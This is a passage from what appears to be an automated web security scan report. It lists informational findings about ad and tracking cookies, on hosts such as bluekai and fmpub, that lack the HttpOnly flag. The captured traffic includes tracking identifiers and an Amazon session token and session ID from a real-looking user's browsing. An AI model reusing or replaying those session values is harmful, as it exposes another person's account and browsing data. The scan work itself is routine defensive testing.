\"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4d4BVgFni2OH171gUGDXuvQXSBowWYD6XBMeVzyxA2a0nVwFlGTQYgDJgNlDmFVjm2HGEDJgNlJm/mFWAUaKpcynYxKZ/J4EmMlgwAGWmf2QGyhzogMgc+LgFLvN3EUjPlzaIzJffMD0iHB0bQTKrWpdC7QGJCnO8cQYK3vq/BElQhGPlWZBXfn9BFZ0CFGWSeIEmeuEDE1D08YQFKKLfv4Ec+P/ZfBTR2TdAos/RRFfMBzlsct/pt8iiO++D1M6avxYhCgAiZ2wN"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNTEyNjk3Nzg5MSUzQXMyLjMzJTNEJTJDODEzMSUyQzQ0MDElMkMyNzUxJTJDODgwMSUyQzgyIiwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiMTk1IjogWyIwY2JjNWY1Yy1lM2ViLWUxMmQtMmMwNi1lZDdjNDBiMTllOTAiLCB0cnVlXSwgIjE5MSI6IFsiMzcwNjY5MjM0NzUxNTM1NjM1OSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEudY7yrALHHs8Pp3LAoMGgwGjBZgNpc4x/FAATaJrSdXQSWYLI4dB7K5hDnehAowSjR1LoVKMFgwAAW/ugIFD3SgCj4BqfzShirYFQ4UXNWKKvhSGCh46/8SFMGrEUCn/f6CKrgmUoBJ4gWa4G5roODjCQtQBBe4AAX/P5uPIrgN5KTJfaffIgvudQEKzpq/FiEIAH6DSTc="; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
9.96. http://tags.bluekai.com/site/2989  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2989

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2989 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: bk=EoW7PfNMNpXBvF/1; bkc=KJyfh1M9LabvQKatNik4/JwCWJORCXSwRDcy4lW01cil1MeyKJtWXIDgD4kzaSMXa6ZGdwJgM9p7wWdbLM9yQF7mxwmxIuah3chozPEIXloDdFoDPef/FzMXZ0S1ecz2W4qwr1S9yC4gxrDnPSe0E4LQfGUhtbThGw9MGK87CFnMviaXJiC4G9JPFq6A3g0UmWvdcYXexTx3/TmV6QsQwJ1biw2sMxsaed/4MnISiTaCXtRsO7TBWwITBGCFlRgvObZcXEZOdnlE/4oOfQchD8oHIRTB3cyxeKw71inLOdWOanh20x==; bko=KJhn8sPQmm586oKH9x9mkyv5; bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Pfi5+/U9WKROAL=; bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmEPgi5+/U9ea4O4x=; bklc=4dca6adb; bkw5=KJhg5tOQuJBGjWCCRsOQjcMo9YJdzxoP1eY6R8P8AzE99991ly3a

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:34:13 GMT
Set-Cookie: bklc=4dcbe1d5; expires=Sat, 14-May-2011 13:34:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QSYgnqNMNpXBvF/1; expires=Tue, 08-Nov-2011 13:34:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhq0Xl9zJueAKc3y2mIM9y1esrOdJHSOCHIe9rY4yC/gJ5iRni55xgmUT4sObZcXP5p1EOLlLp9yv2hyJKJTqQtisd5iLGc3R4h4lW01cQe8UZXEGnNQdM0kSCXgQoDdGLAPcf8BDSsz8T74PARs1aXjbO80w0xmauI+eQ3dlA2v722viG48a8AdA6EHGSf7QMfjNhMxmsn5Sc0CuoxISj2Ww4YIslUsaeTAPel16w8zjDxwCmDnNYO3+8KWkUKuh0CUTbUQuaYkjaOuyADlAp3/wTqBxRDwLCd1eT71cftEG4yxKSeIY7B3cpcOkxIi/qhzhAH8GcT9YVTiZ6=; expires=Tue, 08-Nov-2011 13:34:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:34:13 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
9.97. http://tags.bluekai.com/site/3307  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3307

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3307?ret=html&phint=Channel%3DSports&phint=SubChannel%3DFight%2520Sports&phint=Place%3DNational&phint=Section%3DFight%2520Sports&phint=WriterTopic%3DFight%2520Sports%2520Examiner&phint=Topic%3DFight%2520Sports&phint=__bk_t%3DComplete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20'face'%20and%20new%20feuds%20-%20National%20Fight%20Sports%20%7C%20Examiner.com&phint=__bk_k%3DWWE%2C%20WWE%20SmackDown&limit=7&r=32920141 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:33:33 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=foMj7Fd1lTmVIHOf; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeF2u1pW6GVaZGZKVHkQHPaA8Nb02WLVBeMENYDKLCYnvuyARthA+D6K0LB1tP+/fqstoHupCZ5rKIzpqN2m+dFFq4qb9VVCGefMNgG9eE/yXqBWS4Xqqpu84BBXFubxdprwVaXm3B5efEpHNeZXXPUcze7e7ehbat4NvTjzNIXxzF+9a9owq551rSXIYTek1F90TlllvWt8XVoBwOsXdmW2fS6Rtwril2fQs9EmB+dS7FDZwwiqO2xcc1GncodMDmjXIvRdMmqzTCZFSB5vcBKFWqn2EWyZeewhUxP83kd1kDBm2c5X7Jsrte144awwfebbg95P11zakGrs71dSKbn6pHfrwylFTz5cVM7RtlKhUIqxSPO; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQScCytkKPxHnvWZv/aVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EYL4UMSk84CekYLomSQnhBesaY5e4XIGeGq/1LDpwnZCSCMjAiWLkQR3GYt7P0090Cgp1f9L9d19QekGuHu; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2gPWWDhSz/vsqUaJSORsWf1cdFp96oL38gPa0V5jmDYVXZ1XlYokMKFZe+JNMXYZZY/DN9YNWDWDmSBwA9Pi/t5ZZ2f2ALZKg0mI41w5yk2FWKGd40fGdIWF+1XhNVELSEyt30VU6M2/Ux/hjkAkg/hcDC1pKhzO02Wp0eCZYpa9ZQtdiddF4goY0RhJ6wQjrzn92Y9LzDAA2KsOObdrrDdaKnvIlvJ6JdYENQtQA9PBGTvbttGYlr+EbxFnvXABCGWFlkJZWAKZP9mVDLmv79qpq0ZXUWbz2nxZXJwVxTcOfafRW+7b77CULXBgm+AHGCkcZyBH62b5bL7jwlZn0ggBFoMUg2lScGk5VglQLln4zC5sqEIwHylwH3+IGu2Un+xDCD07A3/dlXppruN231+PQNuvc3FeRfL2ljEFKYIcVfqr/9qnesY37GZA/WpasYe0jQpOehIdLpXF8rNXz+GiN0XLQwx+nza/Qz/yCr1jLzeBGRXsY2dFFAd3NEdxBTeT9O; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpqjLg9T1qjpcYO7RsOizcmAGsOAKWNMfxT9TmUnx1xBemz9Jn1/Yjx8MFwOOBsOiWfC9yEiG0qwRM5eOPekZklRsO/AtCZu9snFUH9tswrMWFwByXQCyFiBARsHZXx0zkNReGe9y9fkhZh; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:33:33 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 375
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1183324&t=2" width=1 height=1 border=0 alt="">
<img src="http://sync.mathtag.com/sync/img?m
...[SNIP]...
9.98. http://tags.bluekai.com/site/3319  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3319

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3319?ret=js&phint=site%3D2&phint=ncat%3D6037%3A13616%3A&phint=ptype%3D2100&phint=cid%3D207595&phint=__bk_t%3DCan%20Intel%20Cedar%20Trail%20Atom%20processors%2C%20along%20with%20Google%20Chromebooks%2C%20resurrect%20the%20netbook%3F%20%7C%20ZDNet&phint=__bk_k%3DSean%20Portnoy%2C%20Laptops%20%26%20Desktops%2C%20Google%20Inc.%2CProcessor%2CDarling%2CPity%2CCasualty%2CNetbook%2CIntel%20Corp.%2CAtom%20Processor%2CNetbooks%2C%20Nettops%20%26amp%3B%20MIDs%2CHardware%2CSean%20Portnoy&jscb=cbsiPrepBK&data=all&r=35648740 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0naVHQtYBXyoKH/DT/hgGOa8FWhLeyudrGnydecPTsCovSQf81ev3XWaktOkAIOGRq3ydTvMa/xkZYesa9FEqXITObqR9LDpenZh4YRZJ/CnvRsS39mATrtxsDBVj7RBQcjQW9KkLCUQ==; bkw5=; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=JzUPJLV5c/sVIHOf; bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=8adNDrWG8QtVIHOf; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56q2n9pWRhFaFd/st3YerfK9oEQf3ov9D8hLgcK3Q7wTJQGJyvQ8iOhcDHPhLJX4ifiuNnEifinmTayEOFv4oljLkTzwfwYxAFEaRleqDwM3C9UgVz8TFkgufQUqoemU3Dmgq94QXQmF7NBN8fR87bEFFtvDhYRdN5+2Np8Jl4LCeLyZF2bkUEgDkfp0SQlzfFXgTSWXf2ih288XHYcqCXFikft7wA7zrMWBkhkOKEd6NifnA7Vwf7GVi/PomcHtinc77nqFz7zBDhMJl+AKhSFrNCPRT0ceiMqhttUw07ddI7GeBBXBI693ngYVrKJjIN+Jlp+7j6Xt48EfibWufasFnfFyntpmxEy==; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGK4OSPXPOAAGu8QCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9sEa/DG=; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhfSX19O161JT9A1TMJy1My7VKYYumeAONYCCaahL6KhsbsiicnZeFMAQW9fZyBxx==; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:28:44 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 637
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 17207,
"timestamp": 1305206924,
"categories": [
{
"categoryID": 78992,
"timestamp": 1305206924
}
]
},
{
"campaign": 1
...[SNIP]...
9.99. http://tags.bluekai.com/site/450  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:31:36 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 13 May 2011 13:31:36 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=EsRCqABGpSIVIHOf; expires=Tue, 08-Nov-2011 13:31:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWRhFcF2uBZxL7mRZqCAoDaa3JGLgfn6uhR6mPwDJub0W/LoneHq/0PRMcjShRSjLgSHZhkg8H0l+Wf88bpKKd22efwFS5EYIOrssRIsoa8oVqsgK4knrFFwoCSY6MKgzz2760fqGSrYTzTkrIgnpFQzhFmcbtqWbTq73VFUM4MKCervX2+PphnU7tECVGPU3bL8y8zuNf5ZTWlLp2nKU4E5KJjIrg4cQQlTcEF3K6Hp8JU8d3CBOoxUnEIsLmh8BVJrz2zwiYK+R8lzYh82SGj8u1Ruk7tSF1g8AldKn/K55n5XknV55sp2BDd9fe0sg9PN31XY0tUwWLdqKZg1tqlzwaFmRXTl755uapnDd6cDKYSNy==; expires=Tue, 08-Nov-2011 13:31:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:31:36 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
9.100. http://tenzing.fmpub.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tenzing.fmpub.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?t=s&n=148&p=2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&d=mashable.com&q=&fleur_de_sel=2268409871030600 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltuid=f1073e09158a180b01ff5b73fb146877; vuid=f1073e09158a180b01ff5b73fb146877

Response

HTTP/1.0 204 No Content
Date: Thu, 12 May 2011 13:31:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Content-Length: 0
X-Server: dynamic1.chi.fmpub.net
Connection: close
Content-Type: text/html; charset=UTF-8

9.101. http://uts.amazon.com/uts/IaR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uts.amazon.com
Path:   /uts/IaR

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uts/IaR?dmnId=imdb.com&tId=&dId=&enId=undefined&eId=view&pId=tt0758746&rP=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F&njh=undefined&cB=7672316606622189 HTTP/1.1
Host: uts.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lc-main=en_US; s_pers=%20s_ev15%3D%255B%255B%2527Typed/Bookmarked%2527%252C%25271303907323249%2527%255D%252C%255B%2527Typed/Bookmarked%2527%252C%25271303911653101%2527%255D%252C%255B%2527www.webstoresellmore.com%2527%252C%25271303919819108%2527%255D%255D%7C1461772619108%3B%20s_dl%3D1%7C1303921676354%3B%20gpv_page%3DUS%253AWS%253APricing-Options%253APricing-Options%7C1303921676363%3B; _mkto_trk=id:810-GRW-452&token:_mch-amazon.com-1303907323369-39830; session-token=45h19hdOPPJ6wOOfLpRhuZ5a+tHbJN0Yn1Pz8Mt9SC8iEu30sQidjghp+yiRcg/lJEw2MQjNsYBTvrnFumfZbugF8QO2HHy6dOzlE94Gg05TyeLIRgBJLrI+NTqi0wO2wJ403GqaJfi7BSth5OxeeVFJ5+daAcNcUOZouvxnpaoJRaKE8bf5vC00RyndOSQu2HP0E3/TBVDD9LtynyiLetGL0vfAM8K9mCUTAxjCXQMh0pHaCNNAFi5s78XmwXgR; __utma=194891197.750670333.1304243790.1304243790.1304243790.1; __utmz=194891197.1304243790.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ubid-main=177-8019787-9467434; session-id-time=2082787201l; session-id=175-8214368-0288160; apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:59 GMT
Server: Server
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cneonction: close
Set-Cookie: apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb; Domain=amazon.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 0

9.102. http://warnerbros.112.2o7.net/b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://warnerbros.112.2o7.net
Path:   /b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

